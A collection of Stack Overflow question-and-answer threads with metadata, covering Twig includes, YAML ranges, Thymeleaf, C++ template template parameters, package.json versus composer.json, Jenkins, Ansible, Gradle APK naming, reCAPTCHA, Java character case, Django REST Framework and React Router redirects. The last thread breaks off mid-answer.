A: To capture chunks of text it is better to use the {% set var %}/{% endset %} tag. This allows you to assign "larger" amount of data to a variable. It's also possible to pass content from another file to the variable this way in combination with include.
{% set json %}
{% include "content.json" %}
{% endset %}
{{ json }}
(sidenote: Content captured as chunk is being treated as safe)
| Q: Set twig variable to json file as an include I have created twig templates and save all the content in a jsonfile. Like this:
Json Data:
{% set contentElements = {
"json structur": {....}
"json structur": {....}
%}
Unfortunately over the years the json files has become bigger and bigger.
So i want to splitt the json data into snippets.
It is possible to set the variable contentElements to an include?
It is not working but something like this:
{% set contentElements = include"content.json "%}
Its an static HTML Project.
A: To capture chunks of text it is better to use the {% set var %}/{% endset %} tag. This allows you to assign "larger" amount of data to a variable. It's also possible to pass content from another file to the variable this way in combination with include.
{% set json %}
{% include "content.json" %}
{% endset %}
{{ json }}
(sidenote: Content captured as chunk is being treated as safe)
| stackoverflow | {
"language": "en",
"length": 164,
"provenance": "stackexchange_0000F.jsonl.gz:900940",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654948"
} |
4f288226dcad9006643755d42f5fa607ab972489 | Stackoverflow Stackexchange
Q: How to express sequence of numbers in yaml Is there any method to express a sequence of numbers in YAML?
To get a sequence from 1 to 100, I can use list(range(1,101)) in Python, or seq(1,100) in R. But do we have any similar way for YAML file?
A: No you cannot, there is no such provision in any of the YAML specifications.
Of course the program that interprets the YAML file could create an object for the tag !range and substitute its nodes with a range:
abc: !range
- 0
- 100
but that is at the application level, and YAML doesn't know anything about it.
| Q: How to express sequence of numbers in yaml Is there any method to express a sequence of numbers in YAML?
To get a sequence from 1 to 100, I can use list(range(1,101)) in Python, or seq(1,100) in R. But do we have any similar way for YAML file?
A: No you cannot, there is no such provision in any of the YAML specifications.
Of course the program that interprets the YAML file could create an object for the tag !range and substitute its nodes with a range:
abc: !range
- 0
- 100
but that is at the application level, and YAML doesn't know anything about it.
| stackoverflow | {
"language": "en",
"length": 108,
"provenance": "stackexchange_0000F.jsonl.gz:900961",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654997"
} |
d81b37b1314115beca5309f0bc1faabf0962a607 | Stackoverflow Stackexchange
Q: Thymeleaf: Html tag inside a th:text Is it possible to have Html tag inside a th:text ?
for instance:
<h2 th:text="'LOCATION INFO Device <strong>' + ${deviceKey} + ' </strong> at ' + ${deviceEventTime} ">
A: Yes, what you have works if you use th:utext instead of th:text.
<h2 th:utext="'LOCATION INFO Device <strong>' + ${deviceKey} + ' </strong> at ' + ${deviceEventTime}" />
I would personally format it like this, however:
<h2>
LOCATION INFO Device
<strong th:text="${deviceKey}" />
at
<span th:text="${deviceEventTime}">
</h2>
(Which may or may not be possible, depending on your actual requirements.)
| Q: Thymeleaf: Html tag inside a th:text Is it possible to have Html tag inside a th:text ?
for instance:
<h2 th:text="'LOCATION INFO Device <strong>' + ${deviceKey} + ' </strong> at ' + ${deviceEventTime} ">
A: Yes, what you have works if you use th:utext instead of th:text.
<h2 th:utext="'LOCATION INFO Device <strong>' + ${deviceKey} + ' </strong> at ' + ${deviceEventTime}" />
I would personally format it like this, however:
<h2>
LOCATION INFO Device
<strong th:text="${deviceKey}" />
at
<span th:text="${deviceEventTime}">
</h2>
(Which may or may not be possible, depending on your actual requirements.)
| stackoverflow | {
"language": "en",
"length": 94,
"provenance": "stackexchange_0000F.jsonl.gz:901006",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655138"
} |
0e7842321c352efe0885b46c00c644bf737855a1 | Stackoverflow Stackexchange
Q: c++: why template cannot be used to deduce both container and element type? I've got a very simple test program like below:
#include<vector>
#include<iostream>
using namespace std;
template<typename C, typename E>
void f(const C<E>& container){
cout<<container.size()<<endl;
}
int main(){
vector<int> i;
f(i);
return 0;
}
It fails to compile with gcc 4.1.2. Error message is:
templateContainer.cpp:5: error: ‘C’ is not a template
templateContainer.cpp: In function ‘int main()’:
templateContainer.cpp:10: error: no matching function for call to ‘f(std::vector<int, std::allocator<int> >&)’
A: std::vector has two template arguments, type and allocator.
template <template<class, class> class C, class E, class A>
void f(const C<E, A> &container)
{
std::cout << container.size() << endl;
}
int main()
{
std::vector<int> i;
f(i);
return 0;
}
| Q: c++: why template cannot be used to deduce both container and element type? I've got a very simple test program like below:
#include<vector>
#include<iostream>
using namespace std;
template<typename C, typename E>
void f(const C<E>& container){
cout<<container.size()<<endl;
}
int main(){
vector<int> i;
f(i);
return 0;
}
It fails to compile with gcc 4.1.2. Error message is:
templateContainer.cpp:5: error: ‘C’ is not a template
templateContainer.cpp: In function ‘int main()’:
templateContainer.cpp:10: error: no matching function for call to ‘f(std::vector<int, std::allocator<int> >&)’
A: std::vector has two template arguments, type and allocator.
template <template<class, class> class C, class E, class A>
void f(const C<E, A> &container)
{
std::cout << container.size() << endl;
}
int main()
{
std::vector<int> i;
f(i);
return 0;
}
A: Although WhiZTiM's answer is correct (well, preferring the second part), it doesn't explain why your code doesn't work.
Assuming for the moment that you intended roughly
template<template <typename> class C, typename E> void f(const C<E>&);
the reason that std::vector doesn't match is that it is the wrong shape - it has two type parameters, not one as in your declaration.
Just because you don't often explicitly write the defaulted second (allocator) param, doesn't mean it isn't there.
For comparison, this works (or doesn't) in an analogous way:
void f(int);
void g(int, int* = nullptr);
void apply(void (*func)(int), int);
apply(f, 42); // ok - f matches shape void(*)(int)
apply(g, 42); // error - g is really void(*)(int,int*)
specifically, default arguments (or type parameters) are syntactic sugar. They allow you to forget about those arguments at the call (instantiation) site, but don't change the shape of the function (or template).
A: You could use a template template parameter (and note that std::vector actually takes more than one template parameter [an element type, and an allocator type]).:
template<template <typename...> class C, typename... E>
void f(const C<E...>& container){
cout<<container.size()<<endl;
}
Live Demo
If you don't need the type decompositions, you could simply use an ordinary template.
template<typename C>
void f(const C& container){
cout<<container.size()<<endl;
}
You can additionally obtain typedefs from STL containers: for example, if you want to know the type of elements held by the container, value_type is there for you.
template<typename C>
void f(const C& container){
using ValueType = typename C::value_type;
cout<<container.size()<<endl;
}
| stackoverflow | {
"language": "en",
"length": 370,
"provenance": "stackexchange_0000F.jsonl.gz:901035",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655222"
} |
69aae1a771fa6111b960416a15d8d0c72e778aba | Stackoverflow Stackexchange
Q: Is the same a package.json and a composer.json? Hello i would like to know if a package.json is the same as a composer.json.
I need to create one file with some content, i required to put it in a package.json file but in the project there is a composer.json already. So can i work in this file or they work diffent?
Thanks
A: Best difference between composer.json & package.json file.
composer.json
*
*Composer is a package manger tool for php.
*composer.json manages the PHP dependencies.
*For Example composer require fzaninotto/faker. This command will open and write to the composer.json file and download all the dependencies
package.json
*
*package.json manages the Node dependencies.
*All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project. This file is used to give information to npm that allows it to identify the project as well as handle the project's dependencies.
| Q: Is the same a package.json and a composer.json? Hello i would like to know if a package.json is the same as a composer.json.
I need to create one file with some content, i required to put it in a package.json file but in the project there is a composer.json already. So can i work in this file or they work diffent?
Thanks
A: Best difference between composer.json & package.json file.
composer.json
*
*Composer is a package manger tool for php.
*composer.json manages the PHP dependencies.
*For Example composer require fzaninotto/faker. This command will open and write to the composer.json file and download all the dependencies
package.json
*
*package.json manages the Node dependencies.
*All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project. This file is used to give information to npm that allows it to identify the project as well as handle the project's dependencies.
A: They are different files. composer.json is for Composer, a package manager for PHP, whereas package.json is for NPM or Yarn, primarily used together with Node.js.
A: In addition to the information you've already been given, about package.json being a file to manage Node dependencies, there is another possibility.
Composer also uses a packages.json file (note the plural) to define a composer repository. It consists of composer.json objects together with information about where to download the files from. https://getcomposer.org/doc/04-schema.md#repositories
Your question's unclear about what you're trying to do. Whilst you tagged javascript, you don't mention it anywhere in the question itself.
A: They are not the same
*
*package.json is a npm file to keep track of npm packages.
*composer.json is a composer file to keep track of php packages.
| stackoverflow | {
"language": "en",
"length": 289,
"provenance": "stackexchange_0000F.jsonl.gz:901036",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655224"
} |
73f6e1929ec7e4ca94ff2daecb7441bbb35acb2b | Stackoverflow Stackexchange
Q: Jenkins Environment variables giving null values as output I am trying to access github env.CHANGE_AUTHOR environment variable from groovy script in jenkins multibranch pipeline.
While some of the environment variables are giving correct output (for example env.JOB_NAME,env.BRANCH_NAME), others like env.CHANGE_AUTHOR_DISPLAY_NAME ,env.CHANGE_AUTHOR_EMAIL are giving null values.
Has anybody come across this issue before? What can be the problem?
A: I've just tested with the github org plugin which uses the multi branch plugin, created a PR and the CI job it does has those env vars present. Using a Jenkinsfile:
node {
echo "${env.getEnvironment()}"
}
In my Jenkins PR build console I see amongst others:
CHANGE_AUTHOR:rawlingsj, CHANGE_AUTHOR_DISPLAY_NAME:James Rawlings, CHANGE_AUTHOR_EMAIL:[email protected], CHANGE_ID:1, CHANGE_TARGET:master, CHANGE_TITLE:test msg, CHANGE_URL:https://github.com/rawlingsj/multi-branch-test/pull/1
Just a wild guess.. do you have your git config user.name and git config user.email set on the commit in the PR? If so it's worth mentioning which version of the multi branch plugin you're using and upgrade to the latest if its old.
| Q: Jenkins Environment variables giving null values as output I am trying to access github env.CHANGE_AUTHOR environment variable from groovy script in jenkins multibranch pipeline.
While some of the environment variables are giving correct output (for example env.JOB_NAME,env.BRANCH_NAME), others like env.CHANGE_AUTHOR_DISPLAY_NAME ,env.CHANGE_AUTHOR_EMAIL are giving null values.
Has anybody come across this issue before? What can be the problem?
A: I've just tested with the github org plugin which uses the multi branch plugin, created a PR and the CI job it does has those env vars present. Using a Jenkinsfile:
node {
echo "${env.getEnvironment()}"
}
In my Jenkins PR build console I see amongst others:
CHANGE_AUTHOR:rawlingsj, CHANGE_AUTHOR_DISPLAY_NAME:James Rawlings, CHANGE_AUTHOR_EMAIL:[email protected], CHANGE_ID:1, CHANGE_TARGET:master, CHANGE_TITLE:test msg, CHANGE_URL:https://github.com/rawlingsj/multi-branch-test/pull/1
Just a wild guess.. do you have your git config user.name and git config user.email set on the commit in the PR? If so it's worth mentioning which version of the multi branch plugin you're using and upgrade to the latest if its old.
A: I think this is related to an existing bug where the git environment variables are always null:
https://issues.jenkins-ci.org/browse/JENKINS-36436
It looks like it was very recently fixed in this PR:
https://github.com/jenkinsci/git-plugin/pull/492
| stackoverflow | {
"language": "en",
"length": 189,
"provenance": "stackexchange_0000F.jsonl.gz:901040",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655235"
} |
7b3b31c200c24ee7ad68095c73c72ee4c43613dc | Stackoverflow Stackexchange
Q: Set variable if empty or not defined with ansible In my ansible vars file, I have a variable that will sometimes be set and other times I want to dynamically set it. For example, I have an RPM that I want to install. I can manually store the location in a variable, or if I don't have a particular one in mind, I want to pull the latest from Jenkins. My question is, how can I check if the variable is not defined or empty, and if so, just use the default from Jenkins (already stored in a var)?
Here is what I have in mind:
...code which gets host_vars[jenkins_rpm]
- hosts: "{{ host }}"
tasks:
- name: Set Facts
set_fact:
jenkins_rpm: "{{ hostvars['localhost']['jenkins_rpm'] }}"
- name: If my_rpm is empty or not defined, just use the jenkins_rpm
set_fact: my_rpm=jenkins_rpm
when: !my_rpm | my_rpm == ""
A: There is default filter for that:
- set_fact:
my_rpm: "{{ my_rpm | default(jenkins_rpm) }}"
| Q: Set variable if empty or not defined with ansible In my ansible vars file, I have a variable that will sometimes be set and other times I want to dynamically set it. For example, I have an RPM that I want to install. I can manually store the location in a variable, or if I don't have a particular one in mind, I want to pull the latest from Jenkins. My question is, how can I check if the variable is not defined or empty, and if so, just use the default from Jenkins (already stored in a var)?
Here is what I have in mind:
...code which gets host_vars[jenkins_rpm]
- hosts: "{{ host }}"
tasks:
- name: Set Facts
set_fact:
jenkins_rpm: "{{ hostvars['localhost']['jenkins_rpm'] }}"
- name: If my_rpm is empty or not defined, just use the jenkins_rpm
set_fact: my_rpm=jenkins_rpm
when: !my_rpm | my_rpm == ""
A: There is default filter for that:
- set_fact:
my_rpm: "{{ my_rpm | default(jenkins_rpm) }}"
| stackoverflow | {
"language": "en",
"length": 162,
"provenance": "stackexchange_0000F.jsonl.gz:901053",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655267"
} |
5a2f2595cd86cb7d8572c5dc618b62b85d2be502 | Stackoverflow Stackexchange
Q: change apk filename in gradle I am trying to use android build tools "com.android.tools.build:gradle:3.0.0-alpha4" in my project. In my build script I rename the output apk which worked fine in the past but does not seem to be supported any more.
applicationVariants.all { variant ->
def filename = "foo-${variant.baseName}-${variant.versionName}-(${android.defaultConfig.versionCode}).apk"
variant.outputs.all { output ->
output.outputFile = new File(
output.outputFile.parent,
filename
)
}
}
Now the propery I am trying to change became immutable:
Error: Cannot set the value of read-only property 'outputFile' for ApkVariantOutputImpl_Decorated{apkData=Main{type=MAIN, fullName=stageDebug, filters=[]}} of type com.android.build.gradle.internal.api.ApkVariantOutputImpl.
Is there a new or an alternate way how to do this?
A: *
*Change each -> to all
*Change output.outputFile -> to outputFileName
before:
android.applicationVariants.all { variant ->
variant.outputs.each { output ->
def finalVersionCode =v10000 + versionCode
output.versionCodeOverride = finalVersionCode
output.outputFile = new File(
output.outputFile.parent, output.outputFile.name.replace(".apk","-${finalVersion}.apk"))
}
}
after:
android.applicationVariants.all { variant ->
variant.outputs.all { output ->
def finalVersionCode = 10000 + versionCode
output.versionCodeOverride = finalVersionCode
outputFileName = new File(
output.outputFile.parent,
outputFileName.replace(".apk", "-${finalVersionCode}.apk"))
}
}
| Q: change apk filename in gradle I am trying to use android build tools "com.android.tools.build:gradle:3.0.0-alpha4" in my project. In my build script I rename the output apk which worked fine in the past but does not seem to be supported any more.
applicationVariants.all { variant ->
def filename = "foo-${variant.baseName}-${variant.versionName}-(${android.defaultConfig.versionCode}).apk"
variant.outputs.all { output ->
output.outputFile = new File(
output.outputFile.parent,
filename
)
}
}
Now the propery I am trying to change became immutable:
Error: Cannot set the value of read-only property 'outputFile' for ApkVariantOutputImpl_Decorated{apkData=Main{type=MAIN, fullName=stageDebug, filters=[]}} of type com.android.build.gradle.internal.api.ApkVariantOutputImpl.
Is there a new or an alternate way how to do this?
A: *
*Change each -> to all
*Change output.outputFile -> to outputFileName
before:
android.applicationVariants.all { variant ->
variant.outputs.each { output ->
def finalVersionCode =v10000 + versionCode
output.versionCodeOverride = finalVersionCode
output.outputFile = new File(
output.outputFile.parent, output.outputFile.name.replace(".apk","-${finalVersion}.apk"))
}
}
after:
android.applicationVariants.all { variant ->
variant.outputs.all { output ->
def finalVersionCode = 10000 + versionCode
output.versionCodeOverride = finalVersionCode
outputFileName = new File(
output.outputFile.parent,
outputFileName.replace(".apk", "-${finalVersionCode}.apk"))
}
}
A: Add e.g. versionName to apk by adding
setProperty("archivesBaseName", archivesBaseName + "-" + versionName)
in defaultConfig closure.
| stackoverflow | {
"language": "en",
"length": 182,
"provenance": "stackexchange_0000F.jsonl.gz:901092",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655405"
} |
d7fdb71d162c5381f461c00423b7eb326cddfa17 | Stackoverflow Stackexchange
Q: How to install Google-Recaptcha from npm I'm implementing recaptcha in my webapp in some forms.
I already implement my backend part and i'm right now trying to install recapatcha api.
Unfornatly, I do not find an official package in npm from google.
Should I use the package googleapis that include recpatcha or
should I include this script :
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
I'm asking this because I build my script files ( including all vendors coming from npm ) with Webpack.
A: You can just use google reCAPTCHA v3 without any npm hassle.
Register from here : https://www.google.com/recaptcha/admin/create
Then for front-end:
<script src="https://www.google.com/recaptcha/api.js?render=reCAPTCHA_site_key"></script>
<script>
grecaptcha.ready(function() {
grecaptcha.execute('reCAPTCHA_site_key', {action: 'homepage'}).then(function(token) {
...
});
});
</script>
In v3 you can define your actions or pass your intent
<script>
grecaptcha.ready(function() {
grecaptcha.execute('reCAPTCHA_site_key', {action: 'homepage'});
});
</script>
| Q: How to install Google-Recaptcha from npm I'm implementing recaptcha in my webapp in some forms.
I already implement my backend part and i'm right now trying to install recapatcha api.
Unfornatly, I do not find an official package in npm from google.
Should I use the package googleapis that include recpatcha or
should I include this script :
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
I'm asking this because I build my script files ( including all vendors coming from npm ) with Webpack.
A: You can just use google reCAPTCHA v3 without any npm hassle.
Register from here : https://www.google.com/recaptcha/admin/create
Then for front-end:
<script src="https://www.google.com/recaptcha/api.js?render=reCAPTCHA_site_key"></script>
<script>
grecaptcha.ready(function() {
grecaptcha.execute('reCAPTCHA_site_key', {action: 'homepage'}).then(function(token) {
...
});
});
</script>
In v3 you can define your actions or pass your intent
<script>
grecaptcha.ready(function() {
grecaptcha.execute('reCAPTCHA_site_key', {action: 'homepage'});
});
</script>
| stackoverflow | {
"language": "en",
"length": 134,
"provenance": "stackexchange_0000F.jsonl.gz:901109",
"question_score": "9",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655445"
} |
b13e9e3678d1290731e1aa5e128e05eeee110b10 | Stackoverflow Stackexchange
Q: Visual Studio 2017 debugger issues with ASP.NET Core When I debug ASP.NET Core applications in Visual Studio 2017 I can't either preview the content of variables hovering over them or use immediate window or auto/local tabs or the quick watch (I get Could not evaluate expression).
I tried both running the app in Kestrel and in IIS Express and I tried enabling Use Managed Compatibility Mode.
Doesn't work with .NET Core console app either.
Still no update from Microsoft: https://developercommunity.visualstudio.com/content/problem/70835/cannot-preview-variables-aspnet-core.html
| Q: Visual Studio 2017 debugger issues with ASP.NET Core When I debug ASP.NET Core applications in Visual Studio 2017 I can't either preview the content of variables hovering over them or use immediate window or auto/local tabs or the quick watch (I get Could not evaluate expression).
I tried both running the app in Kestrel and in IIS Express and I tried enabling Use Managed Compatibility Mode.
Doesn't work with .NET Core console app either.
Still no update from Microsoft: https://developercommunity.visualstudio.com/content/problem/70835/cannot-preview-variables-aspnet-core.html
| stackoverflow | {
"language": "en",
"length": 81,
"provenance": "stackexchange_0000F.jsonl.gz:901119",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655467"
} |
0714d97d5165c043dd8de9d13c83f01c4943d8ea | Stackoverflow Stackexchange
Q: iOS App > Failed to set remote offer sdp: Called with SDP without DTLS fingerprint I'm using RestComm sdk with freeSWITCH sdp in iOS app,
and I'm trying to call user A to user B,
calling connection successfully in both device but I'm receiving call using below function:
**- (IBAction)tappedOnAnswer:(id)sender {
if (self.connection != nil) {
[self.connection accept:[NSDictionary dictionaryWithObject:[NSNumber numberWithBool:NO]
forKey:@"video-enabled"]];
}
}**
but getting Error: {
"NSLocalizedDescription" : "Failed to set remote offer sdp: Called with SDP without DTLS fingerprint."
}
How to solve this issue?
Please help me how to receive call using RestComm sdk.
A: Pankaj, the issue seems to be that the incoming call doesn't use webrtc for media (remember that Restcomm iOS SDK only supports webrtc for media). Can you verify that?
| Q: iOS App > Failed to set remote offer sdp: Called with SDP without DTLS fingerprint I'm using RestComm sdk with freeSWITCH sdp in iOS app,
and I'm trying to call user A to user B,
calling connection successfully in both device but I'm receiving call using below function:
**- (IBAction)tappedOnAnswer:(id)sender {
if (self.connection != nil) {
[self.connection accept:[NSDictionary dictionaryWithObject:[NSNumber numberWithBool:NO]
forKey:@"video-enabled"]];
}
}**
but getting Error: {
"NSLocalizedDescription" : "Failed to set remote offer sdp: Called with SDP without DTLS fingerprint."
}
How to solve this issue?
Please help me how to receive call using RestComm sdk.
A: Pankaj, the issue seems to be that the incoming call doesn't use webrtc for media (remember that Restcomm iOS SDK only supports webrtc for media). Can you verify that?
| stackoverflow | {
"language": "en",
"length": 128,
"provenance": "stackexchange_0000F.jsonl.gz:901142",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655539"
} |
1fd1c1935ba692957dad708145134f4e4ba11a4e | Stackoverflow Stackexchange
Q: Determine if character has case in JAVA In JAVA (Android), I'm trying to determine in a String, if each character has a equivalent in upper or lower case.
My goal is not to lower or upper the case, but to know if it's possible.
For example this function would return true for : 'e' 'é' 'i' 'l' 'L' 'O' 'P'
and false for emojis or chinese characters.
Is there any function that can do this?
EDIT : To be more clear, the function was supposed to take a character for argument, not a String and return false if the character had no uppercase or lowercase version.
A: You can try this:
boolean validate(char c){
return Character.isUpperCase(c) || Character.isLowerCase(c);
}
This will return true iff it is a Letter in uppercase or lower case only. Otherwise it'll return false.
| Q: Determine if character has case in JAVA In JAVA (Android), I'm trying to determine in a String, if each character has a equivalent in upper or lower case.
My goal is not to lower or upper the case, but to know if it's possible.
For example this function would return true for : 'e' 'é' 'i' 'l' 'L' 'O' 'P'
and false for emojis or chinese characters.
Is there any function that can do this?
EDIT : To be more clear, the function was supposed to take a character for argument, not a String and return false if the character had no uppercase or lowercase version.
A: You can try this:
boolean validate(char c){
return Character.isUpperCase(c) || Character.isLowerCase(c);
}
This will return true iff it is a Letter in uppercase or lower case only. Otherwise it'll return false.
A: The requirements are still not entirely specified (do you care whether the upper/lowercase equivalent is a different character from the original?), but my most straightforward interpretation of the question is:
For each character ch in a given string, is it true that either toUpperCase(ch) yields an uppercase character, or that toLowerCase(ch) yields a lowercase character?
I phrase it that way because Character.toUpperCase() returns "the uppercase equivalent of the character, if any; otherwise, the character itself".
The doc for String.toUppercase() doesn't mention what happens if there is no uppercase equivalent for some characters, but I think we can assume it returns those characters unchanged, as does Character.toUpperCase().
So a straightforward implementation of that condition would be to test
Character.isUpperCase(s.toUpperCase().charAt(0)) ||
Character.isLowerCase(s.toLowerCase().charAt(0));
for each character as a String.
I'm using the String rather than Character case conversion functions here, in order to take advantage of locale-sensitive mapping. Not only that, but regardless of locale, there are characters that cannot be converted to uppercase by Character.toUpperCase() because their uppercase equivalent is more than one character! For example, we would get incorrect results for \u00df 'ß' (see docs for details).
public class TestUpper {
public static void main(String[] args) {
final String test = "\u0633\u0644\u0627\u0645 World \u00df\u01c8eéilLOP\u76f4!";
for (Character ch : test.toCharArray()) {
System.out.format("'%c' (U+%04x): hasCase()=%b%n", ch, (int)ch, hasCase(ch));
}
}
static boolean hasCase(Character ch) {
String s = ch.toString();
// Does the character s have an uppercase or a lowercase equivalent?
return Character.isUpperCase(s.toUpperCase().charAt(0)) ||
Character.isLowerCase(s.toLowerCase().charAt(0));
}
}
And the results:
'س' (U+0633): hasCase()=false
'ل' (U+0644): hasCase()=false
'ا' (U+0627): hasCase()=false
'م' (U+0645): hasCase()=false
' ' (U+0020): hasCase()=false
'W' (U+0057): hasCase()=true
'o' (U+006f): hasCase()=true
'r' (U+0072): hasCase()=true
'l' (U+006c): hasCase()=true
'd' (U+0064): hasCase()=true
' ' (U+0020): hasCase()=false
'ß' (U+00df): hasCase()=true
'Lj' (U+01c8): hasCase()=true
'e' (U+0065): hasCase()=true
'é' (U+00e9): hasCase()=true
'i' (U+0069): hasCase()=true
'l' (U+006c): hasCase()=true
'L' (U+004c): hasCase()=true
'O' (U+004f): hasCase()=true
'P' (U+0050): hasCase()=true
'直' (U+76f4): hasCase()=false
'!' (U+0021): hasCase()=false
These test cases include Arabic letters and a Chinese character (which are isLetter(), but have no upper/lowercase equivalents), the requested test letters, space and punctuation, and a titlecase letter.
The results are correct according to the criteria currently stated in the question. However, the OP has said in comments that he wants the function to return false for titlecase characters, such as U+01c8, whereas the above code returns true because they have uppercase and lowercase equivalents (U+01c7 and U+01c9). But the OP's statement seems to be based on the mistaken impression that titlecase letters do not have uppercase and lowercase equivalents. Ongoing discussion has not yet resolved the confusion.
Disclaimer: This answer doesn't attempt to take into account supplementary or surrogate code points.
A: For a simple method, there's Character.isLowerCase. But you actually need to be careful- it depends on language. Some languages may have a lower case 'é' but no uppercase. Or like the turkish "I" may have a different lower case version than other languages.
To work around that, I'd use something like Character.isLetter(myChar) && String.valueOf(myChar).toLowerCase().equals(String.valueOf(myChar)). Remember to use the version of toLowerCase that takes a Locale as parameter if not comparing in the default Locale.
A: Check if the character is either a lowercase letter or an uppercase letter:
Character.isLowerCase(ch) != Character.isUpperCase(ch)
Alternatively, you can compare the lower and uppercased forms of the character:
Character.toLowerCase(ch) == Character.toUpperCase(ch)
However, you need to be careful about locale (there is one letter in Turkish where I think the lower and uppercase forms are the same).
A: public boolean validate(char value){
if( (value >= 'a' && value <= 'z') || (value >= 'A' &&
value <= 'Z')
return true;
return false;
}
this for each caracter to your String.
public boolean All( String cad ){
for( int i = 0; i < cad.lenght() ; i++ ){
if( !validate(cad.charAt(i)) ){
#the letter has not upper or lower
return false;
}
}
return true;
}
A: Two strings uppercase and lowercase not matching does not necessarily mean the string is valid. true1 will not equal TRUE1 but fails the test case. You need to check each individual character. This is a rough cut, you'll probably have to do something fancy for emojis and Chinese characters.
public static boolean isAllCase(String value) {
String upper = value.toUpperCase();
String lower = value.toLowerCase();
if(upper.length() != lower.length())
return false;
for(int i = 0; i < upper.length(); i++) {
if(upper.charAt(i) == lower.charAt(i))
return false;
}
return true;
}
A: public boolean hasEquivalentCase(char ch) {
return (Character.isLowerCase(ch)) || Character.isUpperCase(ch)
}
| stackoverflow | {
"language": "en",
"length": 875,
"provenance": "stackexchange_0000F.jsonl.gz:901147",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655554"
} |
b26c41b8e8de597b891ff29acef4242737f1cf42 | Stackoverflow Stackexchange
Q: Override response of POST in Django Rest Framework I'm using Django Rest Framework's Generics (generics.ListCreateAPIView), when I make a POST request I get a response of Http code (200/400/..etc.) and a JSON showing the posted data, I need to know how can I override the response to get a custom response.
Note that I use
def perform_create(self,serializer):
return Response(<my response>)
to override the POST request handling but I still get the same response
A: The response from perform_create is ignored.
You'll likely want to override the create method using the mixins as example
| Q: Override response of POST in Django Rest Framework I'm using Django Rest Framework's Generics (generics.ListCreateAPIView), when I make a POST request I get a response of Http code (200/400/..etc.) and a JSON showing the posted data, I need to know how can I override the response to get a custom response.
Note that I use
def perform_create(self,serializer):
return Response(<my response>)
to override the POST request handling but I still get the same response
A: The response from perform_create is ignored.
You'll likely want to override the create method using the mixins as example
| stackoverflow | {
"language": "en",
"length": 94,
"provenance": "stackexchange_0000F.jsonl.gz:901171",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655624"
} |
9e9976229fb95777bc4718f3b47b44374e604a06 | Stackoverflow Stackexchange
Q: What is ACTUALLY the right way to transition/redirect using React Router? I'm in the process of learning React Router, and I can't seem to figure out what is currently the recommended way to redirect. I've read many articles and StackOverflow posts, but there is so much variety that I'm unsure of which one to implement for the current version of React Router.
What I'm trying to do is to redirect after an AJAX call using axios.
axios.post('/some-route')
.then(/*I want to redirect here*/)
Note: this code lives inside a function, inside a React.Component, that is called upon the submission of a form.
How do I accomplish this?
Please kindly let me know what details you need.
A: You can use browserHistory :
import { browserHistory } from "react-router";
browserHistory.push({
pathname: '/your/path'
});
| Q: What is ACTUALLY the right way to transition/redirect using React Router? I'm in the process of learning React Router, and I can't seem to figure out what is currently the recommended way to redirect. I've read many articles and StackOverflow posts, but there is so much variety that I'm unsure of which one to implement for the current version of React Router.
What I'm trying to do is to redirect after an AJAX call using axios.
axios.post('/some-route')
.then(/*I want to redirect here*/)
Note: this code lives inside a function, inside a React.Component, that is called upon the submission of a form.
How do I accomplish this?
Please kindly let me know what details you need.
A: You can use browserHistory :
import { browserHistory } from "react-router";
browserHistory.push({
pathname: '/your/path'
});
A:
This answer is for react-router-v4.
If you want to redirect from the same component (not from some action) and this component is rendered by some route then you can use history object passed in the props.
componentDidMount(){
if(this.state.some_param){
this.props.history.push("/some_location")
}
}
Best way is to create your own history object. You can use this history object in any action.
//history.js
import createHistory from 'history/createBrowserHistory'
export default createHistory()
then you can use this history in your router,
import history from "./history"
<Router history = {history}>
//other code
</Router>
now you can use this history object anywhere for redirect,
axios.post('/some-route')
.then(res=>{
history.push("/some_location")
})
const {Component} = React
const {render} = ReactDOM
const {Router, Link, Route, Switch, withRouter, Redirect} = ReactRouterDOM
const createHistory = History.createHashHistory
const myhistory = createHistory()
class App extends Component{
redirectToHome(){
myhistory.push("/home")
}
redirectToAbout(){
myhistory.push("/about")
}
render(){
return(
<div>
<Route path = "/home" component = {Home} />
<Route path = "/about" component = {About} />
<button onClick = {this.redirectToHome}>Redirect to home</button>
<button onClick = {this.redirectToAbout}>Redirect to about</button>
</div>
)
}
}
const Home = ()=>{
return(
<div>
Home
</div>
)
}
const About = ()=>{
return(
<div>About</div>
)
}
render(<Router history = {myhistory}><App/></Router>, document.getElementById('app'))
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react-dom.js"></script>
<script src="https://unpkg.com/[email protected]/umd/react-router-dom.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/history/4.6.3/history.min.js"></script>
<div id="app"></div>
A: Starting from React Router v4, browserHistory is no longer exported from react-router.
You have two possibilities.
1) If your component is rendered via a route (is the component prop of a <Route> component, then you automatically get a few objects as props:
*
*history
*match
*location
